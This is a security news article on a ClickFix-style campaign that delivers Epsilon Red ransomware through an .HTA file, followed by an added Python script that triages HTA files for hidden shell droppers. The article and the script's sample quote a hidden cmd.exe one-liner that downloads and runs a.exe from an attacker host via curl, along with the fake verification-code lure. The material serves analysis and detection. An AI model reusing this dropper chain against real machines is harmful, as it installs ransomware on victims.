
Hackers Use Weaponized .HTA Files to Infect Victims with Red Ransomware


CloudSEK’s TRIAD team uncovered an active development site deploying Clickfix-themed malware linked to the Epsilon Red ransomware.

This variant departs from the usual ClickFix tactic, in which a command is copied to the victim's clipboard for them to paste into a Run dialog. Instead, the victim is sent to a second page on the same domain, delivered as an .HTA file, where the embedded script silently executes shell commands through ActiveXObject("WScript.Shell") to fetch the payload. That object is only exposed when the page is run by mshta.exe (or legacy Internet Explorer), not by a modern browser, which is why the lure must arrive as an HTA rather than an ordinary web page.

The script launches the Windows command shell (cmd.exe) hidden from the user. The one-liner changes to the user's profile directory with "cd /D %userprofile%", silently downloads a binary with curl from the attacker-controlled host 155.94.155.227:2269, saves it as a.exe, and then executes it. The WScript.Shell Run call is given a window-style argument of 0, so no console or program window is ever shown.

This culminates in the deployment of Epsilon Red ransomware, identified by its MD5 hash 98107c01ecd8b7802582d404e007e493.
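As an added example (not code from CloudSEK, gbhackers or the campaign itself), the Python script below performs static triage of an HTA page for the pattern described above: it looks for ActiveXObject("WScript.Shell"), pulls out each .Run() call together with its window-style argument, and extracts the working directory, download URL, dropped file name and final executed stage from the cmd.exe one-liner. The embedded HTA is constructed to mirror the described behaviour; the URL path /a.exe, the curl flags, the JavaScript variable name and the visible-window comparison sample are assumptions.

```python
"""Static triage of a ClickFix-style HTA dropper.

Added example; not CloudSEK's, gbhackers' or the attacker's code.  It scans
HTA/HTML source for ActiveXObject("WScript.Shell"), collects every .Run()
call, records the window-style argument (0 = hidden) and extracts the
working directory, download URL, dropped file and final executed stage from
the shell one-liner.  The samples are constructed; /a.exe, the curl flags
and the variable name are assumptions.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample modelled on the described dropper (not the real file).
SAMPLE_HTA = r'''<html><head><title>Verification</title>
<script language="javascript">
var sh = new ActiveXObject("WScript.Shell");
var cmd = "cmd.exe /c echo Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4 && cd /D %userprofile% && curl -s http://155.94.155.227:2269/a.exe -o a.exe && a.exe";
sh.Run(cmd, 0, false);
</script></head><body></body></html>'''

# Constructed comparison: same object, but a visible window and no download.
VISIBLE_RUN_HTA = '''<script language="javascript">
var sh = new ActiveXObject("WScript.Shell");
sh.Run("notepad.exe", 1, true);
</script>'''

ACTIVEX_RE = re.compile(r'ActiveXObject\(\s*["\']WScript\.Shell["\']\s*\)', re.I)
# `var name = "literal";` assignments, so Run(name, ...) can be resolved.
ASSIGN_RE = re.compile(r'\b(?:var|let|const)\s+(\w+)\s*=\s*"((?:[^"\\]|\\.)*)"\s*;')
# .Run(<literal or identifier> [, intWindowStyle [, bWaitOnReturn]])
RUN_RE = re.compile(
    r'\.Run\(\s*("(?:[^"\\]|\\.)*"|\w+)\s*(?:,\s*(\d+))?(?:\s*,\s*(?:true|false))?\s*\)', re.I)
URL_RE = re.compile(r'https?://[^\s"\'&|<>]+', re.I)


@dataclass
class RunCall:
    command: str
    window_style: Optional[int]          # intWindowStyle passed to Run(); 0 hides the window
    working_dir: Optional[str] = None    # target of `cd [/D] <dir>`
    urls: List[str] = field(default_factory=list)
    dropped_file: Optional[str] = None   # curl -o / --output target
    executed: Optional[str] = None       # last stage of the && chain

    @property
    def hidden(self) -> bool:
        # Only an explicit 0 hides the window; a missing argument shows it.
        return self.window_style == 0


@dataclass
class Finding:
    uses_wscript_shell: bool
    runs: List[RunCall]
    verdict: str                         # "benign", "suspicious" or "malicious"


def _unescape(body: str) -> str:
    """Resolve backslash escapes inside a JS double-quoted string body."""
    return re.sub(r'\\(.)', r'\1', body)


def _analyse_command(cmd: str, style: Optional[int]) -> RunCall:
    """Pull the dropper's stages out of a cmd.exe one-liner."""
    run = RunCall(command=cmd, window_style=style)
    m = re.search(r'\bcd\s+(?:/D\s+)?(\S+)', cmd, re.I)
    run.working_dir = m.group(1) if m else None
    run.urls = URL_RE.findall(cmd)
    m = re.search(r'(?:^|\s)(?:-o|--output)\s+(\S+)', cmd)
    run.dropped_file = m.group(1) if m else None
    stages = [s.strip() for s in re.split(r'&&|\|\||;', cmd) if s.strip()]
    run.executed = stages[-1] if stages else None
    return run


def triage_hta(source: str) -> Finding:
    """Classify an HTA body by how it uses WScript.Shell.Run()."""
    uses = bool(ACTIVEX_RE.search(source))
    variables: Dict[str, str] = {name: _unescape(lit) for name, lit in ASSIGN_RE.findall(source)}
    runs: List[RunCall] = []
    for m in RUN_RE.finditer(source):
        arg, style = m.group(1), m.group(2)
        cmd = _unescape(arg[1:-1]) if arg.startswith('"') else variables.get(arg, arg)
        runs.append(_analyse_command(cmd, int(style) if style is not None else None))
    if uses and any(r.hidden and r.urls for r in runs):
        verdict = "malicious"      # hidden shell that fetches something from the network
    elif uses and runs:
        verdict = "suspicious"     # shell execution from an HTA, but visible or offline
    else:
        verdict = "benign"
    return Finding(uses, runs, verdict)


if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_HTA), ("visible-run", VISIBLE_RUN_HTA)):
        f = triage_hta(src)
        print(label, f.verdict)
        for r in f.runs:
            print("  hidden=%s cwd=%s urls=%s drop=%s exec=%s"
                  % (r.hidden, r.working_dir, r.urls, r.dropped_file, r.executed))
```

On the constructed sample the script reports a hidden Run() that downloads from 155.94.155.227:2269 and executes the dropped a.exe from %userprofile%; that extracted chain is what a responder would pivot on in process-creation telemetry (mshta.exe spawning cmd.exe, then curl.exe, then a.exe from the profile directory). The same-object comparison with a visible window and no URL is downgraded to "suspicious", so the window-style argument is what separates a noisy HTA from a dropper.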

Advanced Clickfix Malware Campaign

To enhance deception, the script displays a fake verification message via “echo Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4 && ...


Copyright of this story solely belongs to gbhackers.